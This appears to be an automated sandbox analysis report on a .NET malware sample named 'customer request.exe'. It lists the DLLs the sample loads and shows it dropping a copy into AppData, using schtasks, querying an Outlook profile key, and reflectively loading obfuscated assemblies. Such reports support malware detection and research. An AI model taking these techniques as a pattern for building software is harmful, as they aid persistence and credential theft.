            Source: C:\Users\user\Desktop\customer request.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: dwrite.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: textshaping.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: iconcodecservice.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: appresolver.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: slc.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: sppc.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: rasapi32.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: rasman.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: rtutils.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: secur32.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeSection loaded: dpapi.dll
            Source: C:\Users\user\Desktop\customer request.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\customer request.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\customer request.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: customer request.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: customer request.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: 0.2.customer request.exe.7dc0000.6.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, s7tEnZsGU0CiWE4q63.cs.Net Code: a8GHSaTcYX System.Reflection.Assembly.Load(byte[])
            Source: 0.2.customer request.exe.4258630.3.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, s7tEnZsGU0CiWE4q63.cs.Net Code: a8GHSaTcYX System.Reflection.Assembly.Load(byte[])
            Source: 0.2.customer request.exe.4c7a580.1.raw.unpack, s7tEnZsGU0CiWE4q63.cs.Net Code: a8GHSaTcYX System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A3E540 push 8C02F6D1h; iretd 0_2_07A3E545
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_07A3E0A8 pushad ; retf 0_2_07A3E0A9
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_092A99E0 push esp; ret 0_2_092A99E1
            Source: C:\Users\user\Desktop\customer request.exeCode function: 0_2_092AA868 push esp; retf 0_2_092AA869
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F2840 push esp; retf 8_2_056F2AC9
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_056F2E78 push esp; iretd 8_2_056F2E79
            Source: C:\Users\user\Desktop\customer request.exeCode function: 8_2_0695F0B2 push es; ret 8_2_0695F0B8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 10_2_08EEA868 push esp; retf 10_2_08EEA869
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 10_2_08EE99E0 push esp; ret 10_2_08EE99E1
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_05252990 pushad ; retf 13_2_05252AC9
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_05252E78 pushad ; iretd 13_2_05252E79
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 13_2_0696F0B2 push es; ret 13_2_0696F0B8
            Source: customer request.exeStatic PE information: section name: .text entropy: 7.694650070350198
            Source: tjvxuavKFXO.exe.0.drStatic PE information: section name: .text entropy: 7.694650070350198
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, Ptwf96BE9v7EsISXRu.csHigh entropy of concatenated method names: 'DT5w2QTUt2', 'vmQwYY2fJM', 'Fn1wwYGkrp', 'WfmwMhVhRF', 'aggwy1A4JT', 'dkOwFK0eO3', 'Dispose', 'gbT4glsV2m', 'iQn4ct3qCB', 'ObV46D4KMW'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, gkL6jmNysptghdYcpQ.csHigh entropy of concatenated method names: 'WT70JO8d87', 'OeM0uNrdU4', 'n0O0v1kQWM', 'fNV0ZjLlQu', 'P9V07KIiLP', 'Ix90mRKsqL', 'CRv0bVT2Ya', 'meg0kopdKR', 'vIy0Q2emXi', 'hiH01IZE5v'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, efgmRCKKu8Y2Q97foO.csHigh entropy of concatenated method names: 'lsWwv5l76I', 'OHCwZouhQj', 'OtDwfNLBMB', 'lrew77UQ3i', 'YhcwmigoqM', 'wyKwRnaenT', 'K7twbqfLfd', 'A2VwkAEIoC', 'NiGwe8Sy3g', 'lFXwQ3mQ3d'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, AGdSZhHM1AGYJCpOk9.csHigh entropy of concatenated method names: 'b3H5WxaQCH', 'pgI5sNh8Um', 'F3e53BbehX', 'Jf95PxeXfK', 'h3U52Vqh8Y', 'g6S5LJOkgC', 'd5RL95mYMnjjuBe4Rj', 'cckOkJPoExnUEyB30h', 'J8Y55u7Hl4', 'JDU5Vk6F0P'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, MXfKbGljepPOW63UVq.csHigh entropy of concatenated method names: 'Dl8Tol0IJ8', 'j4LTGm2bkw', 'yMU6fVLAfv', 'EJs67tShQs', 'bnA6mZUVNP', 'z4u6RyNidB', 'zs26bahn8k', 'Wfq6kFvfCK', 'h3Q6erch1b', 'JUQ6QolMBm'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, hMaaplu3eBbehXmf9x.csHigh entropy of concatenated method names: 'r8O6hxoxip', 'AO16EVv3QZ', 'LrM6Ji9VuS', 'tx16uxOsJq', 'XlF62Cj3oO', 'KMp6LykNBx', 'u8C6YMSvTL', 'MRX64HioBa', 'HTE6wIg0yy', 'oi26nuUIf7'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, pwqggszUXKQrHygH4t.csHigh entropy of concatenated method names: 'LS5nEoOcHd', 'c9AnJeSxNb', 'vGknu7p0mF', 'a1Wnvdl27U', 'TJRnZwrCDN', 'CX2n7smJ5i', 'TnhnmsG4kq', 'URxnFx4CJT', 'a8onCsgY8b', 'MI4ntd4iaE'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, exaQCHJYgINh8UmdbN.csHigh entropy of concatenated method names: 'M2ecI2gMWG', 'clgcimHOZI', 'BsAcxn0vOE', 'TZjcdwQ6xN', 'F9EcX0jiOv', 'I6wcqDe6TS', 'uGjcBq5eQU', 'L5kc8HnPgG', 'Bc6cKT2mmN', 't44c9TLQh1'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, BdwHJypWnaQtGhd35f.csHigh entropy of concatenated method names: 'RZ6Sr8aGS', 'sbghegMGF', 'KyKEpC6Vf', 'G4sG4lqAV', 'jcHurZWjO', 'QBYlnX5OH', 'lNqbd5M8oNICu2qGva', 'npHieFCnSlimZ5OPIt', 'iJo4MQHV4', 'R9PnygSTr'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, YIi2h6cHyIdwL6sDQo.csHigh entropy of concatenated method names: 'Dispose', 'G7E5KsISXR', 'r7gpZlv6aB', 'Wx7qtMyhU7', 'E6s59YTDan', 'qVN5zrr6dW', 'ProcessDialogKey', 'fuOpafgmRC', 'Xu8p5Y2Q97', 'HoOppW67m4'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, Ec2XMFxfaiHxkRmBmn.csHigh entropy of concatenated method names: 'ToString', 'ImDL1ii5T7', 'oSnLZKBFoP', 'TowLfaS0KN', 'SbUL7J1iTb', 'A16LmWC0kF', 'pc6LRqxr5s', 'qigLbkt3yk', 'ysrLkRxWfo', 'YsgLeIwmhq'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, Tnqhso5aBiL7pIZ1D2n.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DRTn1VhWP5', 'KVUnDADir4', 'A9knNXpfBu', 'Vh2nId0mKA', 'PXjnig733N', 'LnDnxmaS3K', 'J2qndT6EGQ'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, A8Yc6SvJOkgCLfdkMW.csHigh entropy of concatenated method names: 'ptLjOVwp1e', 'nCijcBdNTj', 'li7jT7hraB', 'ErojWOb2g9', 'ACyjsV5dpp', 'XhFTX2MRJM', 'NpQTq07fil', 'PoCTB67wwt', 'QfFT8EZ84m', 'CrPTKjNyGb'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, s7tEnZsGU0CiWE4q63.csHigh entropy of concatenated method names: 'oe9VOO3FZP', 'M6lVgmVuKV', 'Rh9Vc16JqN', 'rITV6tGqBN', 'TyrVT9rcB0', 'awuVjZgmQj', 'uXQVWtAc5t', 'Xw2VssPjMs', 'ubZVrNQcsr', 'LLHV35UkIq'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, j67m479qTcYDg5Qguq.csHigh entropy of concatenated method names: 'rWRn67XBtS', 'uHSnTDBg29', 'G0Bnj4jEbH', 'hchnWfXOci', 'JGJnwOykBq', 'zaLnsA5xwV', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, mp4sV1dn69wNfhIg3N.csHigh entropy of concatenated method names: 'NRYY3kRiS8', 'AdUYPsDHYP', 'ToString', 'T7iYgihKCL', 'IWrYcvwejs', 'mXXY6wP20F', 'vPDYTHRJ8D', 'AFUYjB6s1p', 'MNsYWKoAo3', 'K9HYsHrlQe'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, UpvgWE5pceq8dtfURFr.csHigh entropy of concatenated method names: 'ToString', 'p4CMJKiTqA', 'n1lMuDJFU7', 'VEsMlJTO7b', 'OxQMvc1Ubp', 'EqRMZt81IB', 'VrTMflldGA', 'h9sM7h72F5', 'eJBNabYn6yMXT5csZeZ', 'VIJoXiYLw5bWIi32E7T'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, ggYHRHqDX7wH0p7mYb.csHigh entropy of concatenated method names: 'J73Y8PFY2T', 'TLrY9ivX8Y', 'Kvo4aMBHjv', 'HTK45ilxZh', 'NGTY1fSZZ3', 'nZbYDpQGqk', 'OqoYNRT7Pl', 'wpAYIQtmGM', 'x8BYi5Ms0i', 'zXsYxaqTxj'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, TfOtqUbyxqV9FU2AH5.csHigh entropy of concatenated method names: 'eIDWgaj1M6', 's77W6XeIoS', 'eIpWjjRaZ2', 'acXj9hQliE', 'Lqfjz0WZ6s', 'MaSWaBNtRg', 'K71W5E7v3d', 'HGOWpjuXas', 'XEvWVeRDEu', 'mZKWH2cUUf'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, IcyCVre0gh9TpvYKf1.csHigh entropy of concatenated method names: 'MNeWCSbEEL', 'NK2Wtklbot', 'etZWSBf0h0', 'dkcWhCRXrC', 'ShJWooJn1n', 'mXdWEDVOF5', 'grFWGfVeWZ', 'YIvWJBJGeI', 'VVCWua1HIn', 'i09WlonLll'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, qMAX89556eugk2HNcXE.csHigh entropy of concatenated method names: 'oMan9LWHj3', 'Gk5nzkplLX', 'fLVMa6cV2R', 'pdnM5CbMGg', 'ObmMpocVdS', 'oMGMV7YRp8', 'zMOMHyrDQW', 'TyJMOeA9nh', 'Y5jMgY0R5G', 'WoqMc9VnIC'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, YE2KE66fLmJbymeiDC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z5fpKX4veK', 'JFHp9GXqxf', 'RnQpzq6MxA', 'faLVarnmO4', 'HgMV5EIeH7', 'OVeVprlu1X', 'R3wVV1hNnT', 'KyjmATyjVy5AIUHxCJe'
            Source: 0.2.customer request.exe.2ee0000.0.raw.unpack, MVyPJH5HJaOE2TxbUjq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'NbqUwGSeEr', 'KNMUnq22sQ', 'uJoUMp0nDw', 'rhsUU1CKAj', 'llYUym3vpO', 'DIbUAq9Mdl', 'KClUFsDPiE'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, Ptwf96BE9v7EsISXRu.csHigh entropy of concatenated method names: 'DT5w2QTUt2', 'vmQwYY2fJM', 'Fn1wwYGkrp', 'WfmwMhVhRF', 'aggwy1A4JT', 'dkOwFK0eO3', 'Dispose', 'gbT4glsV2m', 'iQn4ct3qCB', 'ObV46D4KMW'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, gkL6jmNysptghdYcpQ.csHigh entropy of concatenated method names: 'WT70JO8d87', 'OeM0uNrdU4', 'n0O0v1kQWM', 'fNV0ZjLlQu', 'P9V07KIiLP', 'Ix90mRKsqL', 'CRv0bVT2Ya', 'meg0kopdKR', 'vIy0Q2emXi', 'hiH01IZE5v'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, efgmRCKKu8Y2Q97foO.csHigh entropy of concatenated method names: 'lsWwv5l76I', 'OHCwZouhQj', 'OtDwfNLBMB', 'lrew77UQ3i', 'YhcwmigoqM', 'wyKwRnaenT', 'K7twbqfLfd', 'A2VwkAEIoC', 'NiGwe8Sy3g', 'lFXwQ3mQ3d'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, AGdSZhHM1AGYJCpOk9.csHigh entropy of concatenated method names: 'b3H5WxaQCH', 'pgI5sNh8Um', 'F3e53BbehX', 'Jf95PxeXfK', 'h3U52Vqh8Y', 'g6S5LJOkgC', 'd5RL95mYMnjjuBe4Rj', 'cckOkJPoExnUEyB30h', 'J8Y55u7Hl4', 'JDU5Vk6F0P'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, MXfKbGljepPOW63UVq.csHigh entropy of concatenated method names: 'Dl8Tol0IJ8', 'j4LTGm2bkw', 'yMU6fVLAfv', 'EJs67tShQs', 'bnA6mZUVNP', 'z4u6RyNidB', 'zs26bahn8k', 'Wfq6kFvfCK', 'h3Q6erch1b', 'JUQ6QolMBm'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, hMaaplu3eBbehXmf9x.csHigh entropy of concatenated method names: 'r8O6hxoxip', 'AO16EVv3QZ', 'LrM6Ji9VuS', 'tx16uxOsJq', 'XlF62Cj3oO', 'KMp6LykNBx', 'u8C6YMSvTL', 'MRX64HioBa', 'HTE6wIg0yy', 'oi26nuUIf7'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, pwqggszUXKQrHygH4t.csHigh entropy of concatenated method names: 'LS5nEoOcHd', 'c9AnJeSxNb', 'vGknu7p0mF', 'a1Wnvdl27U', 'TJRnZwrCDN', 'CX2n7smJ5i', 'TnhnmsG4kq', 'URxnFx4CJT', 'a8onCsgY8b', 'MI4ntd4iaE'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, exaQCHJYgINh8UmdbN.csHigh entropy of concatenated method names: 'M2ecI2gMWG', 'clgcimHOZI', 'BsAcxn0vOE', 'TZjcdwQ6xN', 'F9EcX0jiOv', 'I6wcqDe6TS', 'uGjcBq5eQU', 'L5kc8HnPgG', 'Bc6cKT2mmN', 't44c9TLQh1'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, BdwHJypWnaQtGhd35f.csHigh entropy of concatenated method names: 'RZ6Sr8aGS', 'sbghegMGF', 'KyKEpC6Vf', 'G4sG4lqAV', 'jcHurZWjO', 'QBYlnX5OH', 'lNqbd5M8oNICu2qGva', 'npHieFCnSlimZ5OPIt', 'iJo4MQHV4', 'R9PnygSTr'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, YIi2h6cHyIdwL6sDQo.csHigh entropy of concatenated method names: 'Dispose', 'G7E5KsISXR', 'r7gpZlv6aB', 'Wx7qtMyhU7', 'E6s59YTDan', 'qVN5zrr6dW', 'ProcessDialogKey', 'fuOpafgmRC', 'Xu8p5Y2Q97', 'HoOppW67m4'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, Ec2XMFxfaiHxkRmBmn.csHigh entropy of concatenated method names: 'ToString', 'ImDL1ii5T7', 'oSnLZKBFoP', 'TowLfaS0KN', 'SbUL7J1iTb', 'A16LmWC0kF', 'pc6LRqxr5s', 'qigLbkt3yk', 'ysrLkRxWfo', 'YsgLeIwmhq'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, Tnqhso5aBiL7pIZ1D2n.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DRTn1VhWP5', 'KVUnDADir4', 'A9knNXpfBu', 'Vh2nId0mKA', 'PXjnig733N', 'LnDnxmaS3K', 'J2qndT6EGQ'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, A8Yc6SvJOkgCLfdkMW.csHigh entropy of concatenated method names: 'ptLjOVwp1e', 'nCijcBdNTj', 'li7jT7hraB', 'ErojWOb2g9', 'ACyjsV5dpp', 'XhFTX2MRJM', 'NpQTq07fil', 'PoCTB67wwt', 'QfFT8EZ84m', 'CrPTKjNyGb'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, s7tEnZsGU0CiWE4q63.csHigh entropy of concatenated method names: 'oe9VOO3FZP', 'M6lVgmVuKV', 'Rh9Vc16JqN', 'rITV6tGqBN', 'TyrVT9rcB0', 'awuVjZgmQj', 'uXQVWtAc5t', 'Xw2VssPjMs', 'ubZVrNQcsr', 'LLHV35UkIq'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, j67m479qTcYDg5Qguq.csHigh entropy of concatenated method names: 'rWRn67XBtS', 'uHSnTDBg29', 'G0Bnj4jEbH', 'hchnWfXOci', 'JGJnwOykBq', 'zaLnsA5xwV', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, mp4sV1dn69wNfhIg3N.csHigh entropy of concatenated method names: 'NRYY3kRiS8', 'AdUYPsDHYP', 'ToString', 'T7iYgihKCL', 'IWrYcvwejs', 'mXXY6wP20F', 'vPDYTHRJ8D', 'AFUYjB6s1p', 'MNsYWKoAo3', 'K9HYsHrlQe'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, UpvgWE5pceq8dtfURFr.csHigh entropy of concatenated method names: 'ToString', 'p4CMJKiTqA', 'n1lMuDJFU7', 'VEsMlJTO7b', 'OxQMvc1Ubp', 'EqRMZt81IB', 'VrTMflldGA', 'h9sM7h72F5', 'eJBNabYn6yMXT5csZeZ', 'VIJoXiYLw5bWIi32E7T'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, ggYHRHqDX7wH0p7mYb.csHigh entropy of concatenated method names: 'J73Y8PFY2T', 'TLrY9ivX8Y', 'Kvo4aMBHjv', 'HTK45ilxZh', 'NGTY1fSZZ3', 'nZbYDpQGqk', 'OqoYNRT7Pl', 'wpAYIQtmGM', 'x8BYi5Ms0i', 'zXsYxaqTxj'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, TfOtqUbyxqV9FU2AH5.csHigh entropy of concatenated method names: 'eIDWgaj1M6', 's77W6XeIoS', 'eIpWjjRaZ2', 'acXj9hQliE', 'Lqfjz0WZ6s', 'MaSWaBNtRg', 'K71W5E7v3d', 'HGOWpjuXas', 'XEvWVeRDEu', 'mZKWH2cUUf'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, IcyCVre0gh9TpvYKf1.csHigh entropy of concatenated method names: 'MNeWCSbEEL', 'NK2Wtklbot', 'etZWSBf0h0', 'dkcWhCRXrC', 'ShJWooJn1n', 'mXdWEDVOF5', 'grFWGfVeWZ', 'YIvWJBJGeI', 'VVCWua1HIn', 'i09WlonLll'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, qMAX89556eugk2HNcXE.csHigh entropy of concatenated method names: 'oMan9LWHj3', 'Gk5nzkplLX', 'fLVMa6cV2R', 'pdnM5CbMGg', 'ObmMpocVdS', 'oMGMV7YRp8', 'zMOMHyrDQW', 'TyJMOeA9nh', 'Y5jMgY0R5G', 'WoqMc9VnIC'
            Source: 0.2.customer request.exe.4c15560.2.raw.unpack, YE2KE66fLmJbymeiDC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'z5fpKX4veK', 'JFHp9GXqxf', 'RnQpzq6MxA', 'faLVarnmO4', 'HgMV5EIeH7', 'OVeVprlu1X', 'R3wVV1hNnT', 'KyjmATyjVy5AIUHxCJe'
